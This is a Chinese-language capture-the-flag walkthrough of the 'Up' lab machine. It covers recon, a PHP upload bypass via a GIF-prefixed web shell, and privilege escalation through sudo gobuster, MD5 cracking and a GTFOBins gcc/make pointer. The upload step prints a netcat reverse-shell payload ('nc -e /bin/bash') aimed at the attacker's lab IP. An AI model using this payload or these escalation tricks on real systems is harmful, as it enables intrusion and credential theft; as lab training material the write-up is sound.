文章

Up

Up

image-20250606141749649

image-20250606142303252

信息搜集

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali💀kali)-[~/temp/Up]
└─$ sudo rustscan -a $IP -- -Pn -sCV 

Open 192.168.10.102:80

PORT   STATE SERVICE REASON         VERSION
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: RodGar - Subir Imagen
MAC Address: 08:00:27:F2:3C:F4 (Oracle VirtualBox virtual NIC)

先扫到这,如果没东西再试试udp

目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(kali💀kali)-[~/temp/Up]
└─$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -b 301,401,403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.10.102
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   301,401,403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 4489]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================

漏洞发现

踩点

1
2
3
4
5
6
7
┌──(kali💀kali)-[~/temp/Up]
└─$ curl -s http://$IP | html2text


****** Sube tu Imagen ******
 Haz clic para subir un archivo  [File] Subir Imagen
© RodGar

image-20250606142950437

西班牙语?翻译一下:

image-20250606143019220

难道就是一个简单的上传反弹 shell ?我们再继续看一下敏感目录,看看有没有上传路径吧,尝试一下:

1
2
3
4
5
6
┌──(kali💀kali)-[~/temp/Up]
└─$ curl -s http://$IP/uploads | html2text
****** Moved Permanently ******
The document has moved here.
===============================================================================
     Apache/2.4.62 (Debian) Server at 192.168.10.102 Port 80

原来是一个301,被过滤掉了,为了防止遗漏信息,重新扫描一下:

中间遇到一个有意思的报错,大致如下:

1
2
3
4
5
6
7
8
9
10
11
┌──(kali💀kali)-[~/temp/Up]
└─$ sudo apt-get update                               
Get:1 https://mirrors.ustc.edu.cn/kali kali-rolling InRelease [41.5 kB]
Err:1 https://mirrors.ustc.edu.cn/kali kali-rolling InRelease
  The following signatures couldn't be verified because the public key is not available: NO_PUBKEY ED65462EC8D5E4C5
Reading package lists... Done
W: An error occurred during the signature verification. The repository is not updated and the previous index files will be used. GPG error: https://mirrors.ustc.edu.cn/kali kali-rolling InRelease: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY ED65462EC8D5E4C5
W: Failed to fetch https://mirrors.ustc.edu.cn/kali/dists/kali-rolling/InRelease  The following signatures couldn't be verified because the public key is not available: NO_PUBKEY ED65462EC8D5E4C5
W: Some index files failed to download. They have been ignored, or old ones used instead.
N: Repository 'Kali Linux' changed its 'non-free component' value from 'non-free' to 'non-free non-free-firmware'
N: More information about this can be found online at: https://www.kali.org/blog/non-free-firmware-transition/

可能是由于系统缺少中科大镜像源的GPG公钥,导致APT无法验证软件包的完整性,尝试解决:

1
2
3
4
5
6
7
┌──(kali💀kali)-[~/temp/Up]
└─$ sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys  ED65462EC8D5E4C5
Warning: apt-key is deprecated. Manage keyring files in trusted.gpg.d instead (see apt-key(8)).
Executing: /tmp/apt-key-gpghome.hgs7wruPJi/gpg.1.sh --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys ED65462EC8D5E4C5
gpg: key ED65462EC8D5E4C5: public key "Kali Linux Archive Automatic Signing Key (2025) <devel@kali.org>" imported
gpg: Total number processed: 1
gpg:               imported: 1

顺利解决问题。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(kali💀kali)-[~/temp/Up]
└─$ gobuster dir -u http://$IP/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -b 401,403,404 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.10.102/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   401,403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 4489]
/uploads              (Status: 301) [Size: 318] [--> http://192.168.10.102/uploads/]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.10.102/javascript/]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================

没扫到更多了,递归扫描一下吧:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(kali💀kali)-[~/temp/Up]
└─$ feroxbuster -u http://$IP/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s 200 301 302 
                                                                                                                                                                                             
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.10.102/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ [200, 301, 302]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200      GET      150l      388w     4489c http://192.168.10.102/
301      GET        9l       28w      318c http://192.168.10.102/uploads => http://192.168.10.102/uploads/
301      GET        9l       28w      321c http://192.168.10.102/javascript => http://192.168.10.102/javascript/
301      GET        9l       28w      331c http://192.168.10.102/javascript/clipboard => http://192.168.10.102/javascript/clipboard/
200      GET      858l     3081w    26377c http://192.168.10.102/javascript/clipboard/clipboard
301      GET        9l       28w      328c http://192.168.10.102/javascript/jquery => http://192.168.10.102/javascript/jquery/
200      GET    10907l    44549w   289782c http://192.168.10.102/javascript/jquery/jquery

尝试上传,尝试.jpg但是失败了:

image-20250606150507091

尝试修改后缀为.gif依然失败,抓包上传试试:

image-20250606151643443

依旧失败,再翻翻。。。。

uploads目录下看到了:

image-20250606151922919

其他几个目录没有发现有啥有用信息,尝试重新信息搜集一下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(kali💀kali)-[~/temp/Up]
└─$ feroxbuster -u http://$IP/  -s 200 301 302 -x txt php html
                                                                                                                                                                                             
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.10.102/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ [200, 301, 302]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [txt, php, html]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
301      GET        9l       28w      318c http://192.168.10.102/uploads => http://192.168.10.102/uploads/
301      GET        9l       28w      321c http://192.168.10.102/javascript => http://192.168.10.102/javascript/
200      GET      150l      388w     4489c http://192.168.10.102/
200      GET      150l      388w     4489c http://192.168.10.102/index.php
301      GET        9l       28w      328c http://192.168.10.102/javascript/jquery => http://192.168.10.102/javascript/jquery/
200      GET    10907l    44549w   289782c http://192.168.10.102/javascript/jquery/jquery
200      GET        1l        1w     1301c http://192.168.10.102/uploads/robots.txt
301      GET        9l       28w      331c http://192.168.10.102/javascript/clipboard => http://192.168.10.102/javascript/clipboard/
200      GET      858l     3081w    26377c http://192.168.10.102/javascript/clipboard/clipboard
[####################] - 6m    600076/600076  0s      found:9       errors:172    
[####################] - 6m    120000/120000  359/s   http://192.168.10.102/ 
[####################] - 6m    120000/120000  354/s   http://192.168.10.102/uploads/ 
[####################] - 6m    120000/120000  354/s   http://192.168.10.102/javascript/ 
[####################] - 5m    120000/120000  364/s   http://192.168.10.102/javascript/jquery/ 
[####################] - 5m    120000/120000  434/s   http://192.168.10.102/javascript/clipboard/ 

文件上传

拿到关键目录,尝试进行测试:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(kali💀kali)-[~/temp/Up]
└─$ curl -s http://$IP/uploads/robots.txt            
PD9waHAKaWYgKCRfU0VSVkVSWydSRVFVRVNUX01FVEhPRCddID09PSAnUE9TVCcpIHsKICAgICR0YXJnZXREaXIgPSAidXBsb2Fkcy8iOwogICAgJGZpbGVOYW1lID0gYmFzZW5hbWUoJF9GSUxFU1siaW1hZ2UiXVsibmFtZSJdKTsKICAgICRmaWxlVHlwZSA9IHBhdGhpbmZvKCRmaWxlTmFtZSwgUEFUSElORk9fRVhURU5TSU9OKTsKICAgICRmaWxlQmFzZU5hbWUgPSBwYXRoaW5mbygkZmlsZU5hbWUsIFBBVEhJTkZPX0ZJTEVOQU1FKTsKCiAgICAkYWxsb3dlZFR5cGVzID0gWydqcGcnLCAnanBlZycsICdnaWYnXTsKICAgIGlmIChpbl9hcnJheShzdHJ0b2xvd2VyKCRmaWxlVHlwZSksICRhbGxvd2VkVHlwZXMpKSB7CiAgICAgICAgJGVuY3J5cHRlZEZpbGVOYW1lID0gc3RydHIoJGZpbGVCYXNlTmFtZSwgCiAgICAgICAgICAgICdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6JywgCiAgICAgICAgICAgICdOT1BRUlNUVVZXWFlaQUJDREVGR0hJSktMTW5vcHFyc3R1dnd4eXphYmNkZWZnaGlqa2xtJyk7CgogICAgICAgICRuZXdGaWxlTmFtZSA9ICRlbmNyeXB0ZWRGaWxlTmFtZSAuICIuIiAuICRmaWxlVHlwZTsKICAgICAgICAkdGFyZ2V0RmlsZVBhdGggPSAkdGFyZ2V0RGlyIC4gJG5ld0ZpbGVOYW1lOwoKICAgICAgICBpZiAobW92ZV91cGxvYWRlZF9maWxlKCRfRklMRVNbImltYWdlIl1bInRtcF9uYW1lIl0sICR0YXJnZXRGaWxlUGF0aCkpIHsKICAgICAgICAgICAgJG1lc3NhZ2UgPSAiRWwgYXJjaGl2byBzZSBoYSBzdWJpZG8gY29ycmVjdGFtZW50ZS4iOwogICAgICAgIH0gZWxzZSB7CiAgICAgICAgICAgICRtZXNzYWdlID0gIkh1Ym8gdW4gZXJyb3IgYWwgc3ViaXIgZWwgYXJjaGl2by4iOwogICAgICAgIH0KICAgIH0gZWxzZSB7CiAgICAgICAgJG1lc3NhZ2UgPSAiU29sbyBzZSBwZXJtaXRlbiBhcmNoaXZvcyBKUEcgeSBHSUYuIjsKICAgIH0KfQo/Pgo=

┌──(kali💀kali)-[~/temp/Up]
└─$ curl -s http://$IP/uploads/robots.txt | base64 -d
<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $targetDir = "uploads/";
    $fileName = basename($_FILES["image"]["name"]);
    $fileType = pathinfo($fileName, PATHINFO_EXTENSION);
    $fileBaseName = pathinfo($fileName, PATHINFO_FILENAME);

    $allowedTypes = ['jpg', 'jpeg', 'gif'];
    if (in_array(strtolower($fileType), $allowedTypes)) {
        $encryptedFileName = strtr($fileBaseName, 
            'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz', 
            'NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm');

        $newFileName = $encryptedFileName . "." . $fileType;
        $targetFilePath = $targetDir . $newFileName;

        if (move_uploaded_file($_FILES["image"]["tmp_name"], $targetFilePath)) {
            $message = "El archivo se ha subido correctamente.";
        } else {
            $message = "Hubo un error al subir el archivo.";
        }
    } else {
        $message = "Solo se permiten archivos JPG y GIF.";
    }
}
?>

把源代码给翻出来了。。。。之前为啥没上传成功?难道是因为我传上去的4k高清动漫御姐图太大了吗?尝试删除部分内容看看能不能上传。。。。

image-20250606153114670

好吧,这个靶机好不解风情。。。。

审计一下源码发现是一个rot13加密,这很简单,尝试上传反弹shell:

先准备一个反弹shell

1
2
3
4
5
6
7
8
9
10
┌──(kali💀kali)-[~/temp/Up]
└─$ echo 'GIF89a' > a.gif                                                              

┌──(kali💀kali)-[~/temp/Up]
└─$ echo "<?php system('nc -e /bin/bash 192.168.10.101 1234');?>" >> a.gif

┌──(kali💀kali)-[~/temp/Up]
└─$ cat a.gif                                                                              
GIF89a
<?php system('nc -e /bin/bash 192.168.10.101 1234');?>

尝试上传

中间发现前端也有提示:

image-20250606153757282

尝试上传以后在访问一下,就弹回来了!

1
2
3
┌──(kali💀kali)-[~/temp/Up]
└─$ curl -s http://$IP/uploads/n.gif

image-20250606155250376

提权

信息搜集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
(remote) www-data@debian:/var/www/html/uploads$ whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
(remote) www-data@debian:/var/www/html/uploads$ awk -F: '{print $1}' /etc/passwd
root
daemon
bin
sys
sync
games
man
lp
mail
news
uucp
proxy
www-data
backup
list
irc
_apt
nobody
systemd-network
tss
systemd-timesync
messagebus
usbmux
dnsmasq
avahi
speech-dispatcher
fwupd-refresh
saned
geoclue
polkitd
rtkit
colord
gnome-initial-setup
Debian-gdm
rodgar
(remote) www-data@debian:/var/www/html/uploads$ ls -la /home/
total 12
drwxr-xr-x  3 root   root   4096 Oct 22  2024 .
drwxr-xr-x 20 root   root   4096 Oct 22  2024 ..
drwxr-xr-x  3 rodgar rodgar 4096 Oct 22  2024 rodgar
(remote) www-data@debian:/var/www/html/uploads$ cd /home/rodgar/
(remote) www-data@debian:/home/rodgar$ ls -la
total 36
drwxr-xr-x 3 rodgar rodgar 4096 Oct 22  2024 .
drwxr-xr-x 3 root   root   4096 Oct 22  2024 ..
-rw------- 1 rodgar rodgar    0 Oct 22  2024 .bash_history
-rw-r--r-- 1 rodgar rodgar  220 Mar 29  2024 .bash_logout
-rw-r--r-- 1 rodgar rodgar 3526 Mar 29  2024 .bashrc
-rw-r--r-- 1 rodgar rodgar 5290 Jul 12  2023 .face
lrwxrwxrwx 1 rodgar rodgar    5 Jul 12  2023 .face.icon -> .face
drwxr-xr-x 3 rodgar rodgar 4096 Oct 22  2024 .local
-rw-r--r-- 1 rodgar rodgar  807 Mar 29  2024 .profile
-rw-r--r-- 1 rodgar rodgar   24 Oct 22  2024 user.txt
(remote) www-data@debian:/home/rodgar$ cat user.txt 
b45cffe084dd3d20d928bee
(remote) www-data@debian:/home/rodgar$ sudo -l
Matching Defaults entries for www-data on debian:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User www-data may run the following commands on debian:
    (ALL) NOPASSWD: /usr/bin/gobuster
(remote) www-data@debian:/home/rodgar$ find / -type f -perm -u=s 2>/dev/null
/usr/bin/chfn
/usr/bin/su
/usr/bin/passwd
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/fusermount3
/usr/bin/ntfs-3g
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/mount
/usr/bin/vmware-user-suid-wrapper
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/xorg/Xorg.wrap
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/snap/core/17200/bin/mount
/snap/core/17200/bin/ping
/snap/core/17200/bin/ping6
/snap/core/17200/bin/su
/snap/core/17200/bin/umount
/snap/core/17200/usr/bin/chfn
/snap/core/17200/usr/bin/chsh
/snap/core/17200/usr/bin/gpasswd
/snap/core/17200/usr/bin/newgrp
/snap/core/17200/usr/bin/passwd
/snap/core/17200/usr/bin/sudo
/snap/core/17200/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/17200/usr/lib/openssh/ssh-keysign
/snap/core/17200/usr/lib/snapd/snap-confine
/snap/core/17200/usr/sbin/pppd
/snap/core/17210/bin/mount
/snap/core/17210/bin/ping
/snap/core/17210/bin/ping6
/snap/core/17210/bin/su
/snap/core/17210/bin/umount
/snap/core/17210/usr/bin/chfn
/snap/core/17210/usr/bin/chsh
/snap/core/17210/usr/bin/gpasswd
/snap/core/17210/usr/bin/newgrp
/snap/core/17210/usr/bin/passwd
/snap/core/17210/usr/bin/sudo
/snap/core/17210/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/17210/usr/lib/openssh/ssh-keysign
/snap/core/17210/usr/lib/snapd/snap-confine
/snap/core/17210/usr/sbin/pppd
(remote) www-data@debian:/home/rodgar$ cd ~
(remote) www-data@debian:/var/www$ ls -la
total 12
drwxr-xr-x  3 root     root     4096 Oct 13  2024 .
drwxr-xr-x 13 root     root     4096 Oct 22  2024 ..
drwxr-xr-x  3 www-data www-data 4096 Oct 22  2024 html
(remote) www-data@debian:/var/www$ cd html
(remote) www-data@debian:/var/www/html$ ls -la
total 1324
drwxr-xr-x 3 www-data www-data    4096 Oct 22  2024 .
drwxr-xr-x 3 root     root        4096 Oct 13  2024 ..
-rw-r--r-- 1 root     root          37 Oct 22  2024 .htaccess
-rw-r--r-- 1 root     root        6031 Oct 22  2024 index.php
-rw-r--r-- 1 root     root     1330919 Oct 22  2024 sh.jpg
drwxr-xr-x 2 www-data www-data    4096 Jun  6 01:49 uploads
(remote) www-data@debian:/var/www/html$ cat sh.jpg | head -n 10
----------
cat: write error: Broken pipe
(remote) www-data@debian:/var/www/html$ cat .htaccess 
AddType application/x-httpd-php .gif
(remote) www-data@debian:/var/www/html$ cd uploads
(remote) www-data@debian:/var/www/html/uploads$ ls -la
total 32
drwxr-xr-x 2 www-data www-data 4096 Jun  6 01:49 .
drwxr-xr-x 3 www-data www-data 4096 Oct 22  2024 ..
-rw-r--r-- 1 www-data www-data   63 Oct 20  2024 .htaccess
-rw-r--r-- 1 root     root      964 Oct 22  2024 access_denied.html
-rw-r--r-- 1 root     root       17 Oct 22  2024 clue.txt
-rw-r--r-- 1 www-data www-data   12 Jun  6 01:31 grfg.gif
-rw-r--r-- 1 www-data www-data   62 Jun  6 01:49 n.gif
-rw-r--r-- 1 root     root     1301 Oct 22  2024 robots.txt
(remote) www-data@debian:/var/www/html/uploads$ cat clue.txt 
/root/rodgarpass
(remote) www-data@debian:/var/www/html/uploads$ ls -la /root/rodgarpass
ls: cannot access '/root/rodgarpass': Permission denied
(remote) www-data@debian:/var/www/html/uploads$ cat .htaccess
Options -Indexes
ErrorDocument 403 /uploads/access_denied.html

发现了一个奇怪的文件显示了一个更奇怪的文件/root/rodgarpass看起来有点像rodgar用户的密码,根据刚刚找到的用户来看确实存在一个名为rodgar的用户,现在就是要找到这个密码了,尝试一下。

gobuster提取文件内容

发现可以使用gobuster,看一下使用方式能不能从之得到相关的内容!由于gobuster是扫描工具,且本地只存在一个网站,尝试使用密码文件作为字典进行扫描,然后不对扫描结果进行过滤,得到密码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
(remote) www-data@debian:/tmp$ /usr/bin/gobuster -h
Usage:
  gobuster [command]

Available Commands:
  completion  Generate the autocompletion script for the specified shell
  dir         Uses directory/file enumeration mode
  dns         Uses DNS subdomain enumeration mode
  fuzz        Uses fuzzing mode. Replaces the keyword FUZZ in the URL, Headers and the request body
  gcs         Uses gcs bucket enumeration mode
  help        Help about any command
  s3          Uses aws bucket enumeration mode
  tftp        Uses TFTP enumeration mode
  version     shows the current version
  vhost       Uses VHOST enumeration mode (you most probably want to use the IP address as the URL parameter)

Flags:
      --delay duration    Time each thread waits between requests (e.g. 1500ms)
  -h, --help              help for gobuster
      --no-color          Disable color output
      --no-error          Don't display errors
  -z, --no-progress       Don't display progress
  -o, --output string     Output file to write results to (defaults to stdout)
  -p, --pattern string    File containing replacement patterns
  -q, --quiet             Don't print the banner and other noise
  -t, --threads int       Number of concurrent threads (default 10)
  -v, --verbose           Verbose output (errors)
  -w, --wordlist string   Path to the wordlist

Use "gobuster [command] --help" for more information about a command.

(remote) www-data@debian:/tmp$ sudo gobuster dir -u http://127.0.0.1 -w /root/rodgarpass -v
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://127.0.0.1
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /root/rodgarpass
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Verbose:                 true
[+] Timeout:                 10s
===============================================================
2025/06/06 02:13:32 Starting gobuster in directory enumeration mode
===============================================================

Missed: /b45cffe084dd3d20d928bee85e7b0f2 (Status: 404) [Size: 271]
===============================================================
2025/06/06 02:13:32 Finished
===============================================================

也可以用来扫描本地服务器,观察扫描内容:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
(remote) www-data@debian:/tmp$ sudo gobuster dir -u http://192.168.10.101:8888 -w /root/rodgarpass   
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.10.101:8888
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /root/rodgarpass
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2025/06/06 02:15:24 Starting gobuster in directory enumeration mode
===============================================================

Error: the server returns a status code that matches the provided options for non existing urls. http://192.168.10.101:8888/fb142dce-9df8-40aa-a617-1adc4232186c => 302 (Length: 189). To continue please exclude the status code or the length

image-20250606161546898

破译密码

这个密码看上去不像是明文,最大为f是16进制,可能是hash,但是也不排除是密码,尝试切换,发现失败。。。。

1
2
3
(remote) www-data@debian:/tmp$ su rodgar
Password: 
su: Authentication failure

image-20250606162200619

发现了密码为string,但是登录仍然失败。。。。。然后发现:

1
2
3
┌──(kali💀kali)-[~/temp/Up]
└─$ echo -n "string" | md5sum                                                          
b45cffe084dd3d20d928bee85e7b0f21  -

这里应该作者是想我们对最后一个字符串进行枚举的。。。。。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
┌──(kali💀kali)-[~/temp/Up]
└─$ for last_char in {0..9} {a..f}; do echo "b45cffe084dd3d20d928bee85e7b0f2$last_char" >> hash; done 

┌──(kali💀kali)-[~/temp/Up]
└─$ cat hash
b45cffe084dd3d20d928bee85e7b0f20
b45cffe084dd3d20d928bee85e7b0f21
b45cffe084dd3d20d928bee85e7b0f22
b45cffe084dd3d20d928bee85e7b0f23
b45cffe084dd3d20d928bee85e7b0f24
b45cffe084dd3d20d928bee85e7b0f25
b45cffe084dd3d20d928bee85e7b0f26
b45cffe084dd3d20d928bee85e7b0f27
b45cffe084dd3d20d928bee85e7b0f28
b45cffe084dd3d20d928bee85e7b0f29
b45cffe084dd3d20d928bee85e7b0f2a
b45cffe084dd3d20d928bee85e7b0f2b
b45cffe084dd3d20d928bee85e7b0f2c
b45cffe084dd3d20d928bee85e7b0f2d
b45cffe084dd3d20d928bee85e7b0f2e
b45cffe084dd3d20d928bee85e7b0f2f

┌──(kali💀kali)-[~/temp/Up]
└─$ hash-identifier b45cffe084dd3d20d928bee85e7b0f20                                
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
[+] MD4(HMAC)
[+] MD2(HMAC)
[+] MD5(HMAC(Wordpress))
[+] Haval-128
[+] Haval-128(HMAC)
[+] RipeMD-128
[+] RipeMD-128(HMAC)
[+] SNEFRU-128
[+] SNEFRU-128(HMAC)
[+] Tiger-128
[+] Tiger-128(HMAC)
[+] md5($pass.$salt)
[+] md5($salt.$pass)
[+] md5($salt.$pass.$salt)
[+] md5($salt.$pass.$username)
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($salt.$pass))
[+] md5($salt.md5(md5($pass).$salt))
[+] md5($username.0.$pass)
[+] md5($username.LF.$pass)
[+] md5($username.md5($pass).$salt)
[+] md5(md5($pass))
[+] md5(md5($pass).$salt)
[+] md5(md5($pass).md5($salt))
[+] md5(md5($salt).$pass)
[+] md5(md5($salt).md5($pass))
[+] md5(md5($username.$pass).$salt)
[+] md5(md5(md5($pass)))
[+] md5(md5(md5(md5($pass))))
[+] md5(md5(md5(md5(md5($pass)))))
[+] md5(sha1($pass))
[+] md5(sha1(md5($pass)))
[+] md5(sha1(md5(sha1($pass))))
[+] md5(strtoupper(md5($pass)))
--------------------------------------------------
 HASH: ^C

        Bye!
                                                                                                                                                                                             
┌──(kali💀kali)-[~/temp/Up]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash --format=Raw-Md5   
Using default input encoding: UTF-8
Loaded 16 password hashes with no different salts (Raw-MD5 [MD5 128/128 SSE2 4x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
string           (?)     
1g 0:00:00:01 DONE (2025-06-06 04:32) 0.9090g/s 13039Kp/s 13039Kc/s 195614KC/s  fuckyooh21..*7¡Vamos!
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.

然后尝试用完整的md5进行登录,成功。

image-20250606164227845

gcc make提权root

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
rodgar@debian:/tmp$ cd ~
rodgar@debian:~$ whoami;id;ls -la
rodgar
uid=1001(rodgar) gid=1001(rodgar) grupos=1001(rodgar)
total 40
drwxr-xr-x 4 rodgar rodgar 4096 jun  6 02:41 .
drwxr-xr-x 3 root   root   4096 oct 22  2024 ..
-rw------- 1 rodgar rodgar    0 oct 22  2024 .bash_history
-rw-r--r-- 1 rodgar rodgar  220 mar 29  2024 .bash_logout
-rw-r--r-- 1 rodgar rodgar 3526 mar 29  2024 .bashrc
drwx------ 3 rodgar rodgar 4096 jun  6 02:41 .cache
-rw-r--r-- 1 rodgar rodgar 5290 jul 12  2023 .face
lrwxrwxrwx 1 rodgar rodgar    5 jul 12  2023 .face.icon -> .face
drwxr-xr-x 4 rodgar rodgar 4096 jun  6 02:41 .local
-rw-r--r-- 1 rodgar rodgar  807 mar 29  2024 .profile
-rw-r--r-- 1 rodgar rodgar   24 oct 22  2024 user.txt
rodgar@debian:~$ sudo -l
Matching Defaults entries for rodgar on debian:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User rodgar may run the following commands on debian:
    (ALL : ALL) NOPASSWD: /usr/bin/gcc, /usr/bin/make

根据以下进行提权:

https://gtfobins.github.io/gtfobins/gcc/#sudo

